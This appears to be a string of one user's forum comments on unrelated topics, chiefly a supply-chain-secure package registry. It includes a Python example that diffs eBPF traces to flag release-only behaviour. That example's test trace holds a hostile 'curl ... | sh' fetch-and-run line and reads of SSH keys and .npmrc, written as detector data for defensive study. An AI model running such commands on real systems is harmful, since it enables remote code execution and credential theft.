What does production ready even mean? The problem with AI is that there isn't an obvious way to prove how much human attention/care was actually put in & thus no signal on quality. Nobody is gonna review 1M lines. Also, the 1M line number shouldn't really be a boast. More lines != higher quality or more features
Fair points. "Production-ready" was probably too strong for v0.1.0 — "API-stable" is more accurate. The crates compile, pass their test suites, and the public API surface is locked, but real production readiness comes from users hitting edge cases we haven't. (no-warnings policy, etc.)
On line count — you're right that more lines isn't inherently better. I mentioned it as a scale indicator, not a quality claim. The meaningful numbers are the 92 crates, the codec/container/protocol coverage, and the test results.
Happy to discuss any specific module if you want to dig into the details.
I've been working on a project lately as my bachelor's dissertation, which I plan on continuing to work on long term.
The basic premise is a secure package registry as an alternative to npm/PyPI/etc. where we use a bunch of different methods to try to minimize risk. So e.g. reproducible builds, tracing execution and finding behavioral differences between release and source, historical behavioral anomalies, behavioral differences with a baseline safe package, etc. And then rather than having to install any client-side software, just do a `npm config set registry https://reg.example.com/api/packages/secure/npm/`
eBPF traces of high level behavior like network requests & file accesses should catch the most basic mass supply chain attacks like Shai Hulud. The more difficult one is xz-utils style attacks where it's a subtle backdoor. That requires tests that we can run reproducibly across versions & tracing exact behavior.
Hopefully by automating as much as possible, we can make this generally accessible rather than expensive enterprise-only like most security products (really annoys me). Still definitely need a layer of human reviews for anything it flags though since a false positive might as well be defamation.
Won't know if this is the right direction until things are done & we can benchmark against actual case studies, but at least one startup accelerator is interested in funding.
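The release-vs-source behavioral diff described in the post above, as an added example that is not part of the original post or of the registry project. It assumes an eBPF tracer has already recorded the package's build/test run as one JSON event per line with `ev`, `path`/`flags`, `dst`/`port` and `argv` fields (the schema, the ephemeral-path pattern, the sensitive-path list and both sample traces are constructed for this example); it normalizes the events, takes the set difference between the release run and the reproducible source-build run, and ranks what is new in the release.

```python
"""Behavioral diff of two traced package runs (added example, constructed data).

Assumption: events were collected by an eBPF tracer hooking connect/openat/execve
and written one JSON object per line. Field names below are this example's own.
"""
import json
import re
from typing import Dict, List, Set, Tuple

Behavior = Tuple[str, ...]

# Per-run scratch directories differ on every build and must not count as a
# behavioral difference (constructed pattern for the sandbox's temp root).
EPHEMERAL = re.compile(r"/tmp/build-[0-9a-f]+")
# Paths a package's build or test step has no business touching.
SENSITIVE = (".ssh/", ".npmrc", ".aws/", ".gnupg/", "/.env")

# Constructed traces: the reproducible source build vs. the published artifact.
# 203.0.113.7 is a documentation address (TEST-NET-3), not a real host.
SOURCE_TRACE = """\
{"ev":"openat","path":"/build/pkg/package.json","flags":"O_RDONLY"}
{"ev":"openat","path":"/build/pkg/lib/index.js","flags":"O_RDONLY"}
{"ev":"openat","path":"/tmp/build-a1b2/out.log","flags":"O_WRONLY"}
{"ev":"execve","argv":["node","test/run.js"]}
{"ev":"connect","dst":"registry.npmjs.org","port":443}
"""
RELEASE_TRACE = """\
{"ev":"openat","path":"/build/pkg/package.json","flags":"O_RDONLY"}
{"ev":"openat","path":"/build/pkg/lib/index.js","flags":"O_RDONLY"}
{"ev":"openat","path":"/tmp/build-9f8e/out.log","flags":"O_WRONLY"}
{"ev":"openat","path":"/home/ci/.npmrc","flags":"O_RDONLY"}
{"ev":"openat","path":"/home/ci/.ssh/id_ed25519","flags":"O_RDONLY"}
{"ev":"execve","argv":["node","test/run.js"]}
{"ev":"execve","argv":["/bin/sh","-c","curl -s https://203.0.113.7/x | sh"]}
{"ev":"connect","dst":"registry.npmjs.org","port":443}
{"ev":"connect","dst":"203.0.113.7","port":443}
"""


def parse_trace(text: str) -> List[dict]:
    """One JSON event per non-empty line, as the tracer emits them."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def normalize(ev: dict) -> Behavior:
    """Reduce a raw event to a comparable behavior key (drops run-specific noise)."""
    kind = ev["ev"]
    if kind == "openat":
        return ("file", EPHEMERAL.sub("/tmp/build-*", ev["path"]), ev.get("flags", ""))
    if kind == "connect":
        return ("net", ev["dst"], str(ev["port"]))
    if kind == "execve":
        return ("exec", " ".join(ev["argv"]))
    return ("other", kind)


def profile(events: List[dict]) -> Set[Behavior]:
    """The set of distinct behaviors a run exhibited; order and counts are ignored."""
    return {normalize(e) for e in events}


def classify(b: Behavior) -> Tuple[str, str]:
    """Severity for a behavior that appears only in the release run."""
    kind = b[0]
    if kind == "net":
        return "high", f"new network destination {b[1]}:{b[2]}"
    if kind == "exec":
        return "high", f"new process: {b[1]}"
    if kind == "file":
        if any(s in b[1] for s in SENSITIVE):
            return "high", f"sensitive file access {b[1]} ({b[2]})"
        return "low", f"new file access {b[1]} ({b[2]})"
    return "low", f"new event {b}"


def diff_profiles(source: Set[Behavior], release: Set[Behavior]) -> List[Dict[str, str]]:
    """Behaviors present in the release run but absent from the source-build run."""
    return [
        {"severity": sev, "behavior": msg}
        for sev, msg in (classify(b) for b in sorted(release - source))
    ]


def analyze(source_trace: str, release_trace: str) -> List[Dict[str, str]]:
    """End-to-end: parse both traces, profile them, report what the release added."""
    return diff_profiles(profile(parse_trace(source_trace)),
                         profile(parse_trace(release_trace)))


if __name__ == "__main__":
    for f in analyze(SOURCE_TRACE, RELEASE_TRACE):
        print(f"[{f['severity']}] {f['behavior']}")
```

Note that the matching `/tmp/build-*/out.log` write is not reported because it was normalized away; that normalization is where most of the false-positive tuning lives, and anything left at "high" is exactly what the post says still needs a human reviewer before it is published as a finding.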
I registered it about 40 minutes ago, but it seems the DNS has been cached by everyone as a result of the Wikipedia hack & not even the NS is propagating. Can't get an SSL certificate.
I had looked into its availability on a provider too, just out of curiosity, and then I read your comment. At least it's been taken by the Hacker News community and not a malicious actor.
Do keep us updated on the whole situation if anything relevant happens from your POV.
I'd suggest giving the domain to the Wikipedia team, as they might know the best use for it, if possible.
Not quite sure which channels I should reach out via but I've put my email on the page so they can contact me.
Based on timings, it seems that Wikipedia wasn't really at risk from the domain being bought as everything was resolved before NS records could propagate. I got 1 hit from the URL which would've loaded up the script and nothing since.
It's misinformation that the malicious script loaded that domain. The malicious script did have a URL with that domain in it, but it wouldn't load JavaScript from it (possibly due to a programming mistake/misunderstanding by the author; it's kind of unclear what the original intent was).
> they are using Apple's Wi-Fi positioning service, but proxying it through their own servers
My concern with this system is that their proxy is (afaik) compatible with Google's format, which by default is less privacy respecting as it does the location calculation server side and doesn't allow the client to cache.
I'd much prefer if they called out to Apple's servers directly (or through a direct proxy) & cached the AP data locally so over time it will work offline.
I say it somewhat jokingly. Most of the challenges were AI, but there was a specific security track that wasn't about AI (but AI bug bounty hunter won. Not too mad, just annoyed at miscommunication about which countries the sponsor was actually in).
> If anything, this is pretty much the opposite of what a hackathon is supposed to be: A place where you meet people you might not even know, come up with an idea on the spot and develop an MVP + pitch it on a tight (time) budget. Taking an idea you've already been working on for months and using it for a hackathon submission feels... odd
The thing I've been working on is a much larger encompassing system where this would just be a small component. No code reused because no code was written for this yet. My task now is to take the shit code written during the hackathon and make it actually usable.
> The first is probably true, but to really judge the impact of it (Did AI generated ideas actually win?) we'd have to see the results
Yes, the winner also won the Lovable and Claude tracks. Lovable track was specifically about vibe-coding.
100% agree, even as someone who grew up around people speaking Mandarin. I still cannot write despite having taken the language in both GCSEs and IB, while also living in the country for 3+ years.
I can speak the language just enough to get by, but once you get into technical terms, I'm once again completely lost. Unless they do a Singapore or Dubai and make business in English, I don't see any chance of them attracting talent.
The current spikes tempt me to sell off my home lab: a Mac mini to sell to the OpenClaw bros, a 5TB HDD, an Intel NUC, some SSDs, and a 5-year-old Dell laptop. Can always buy back after the crash.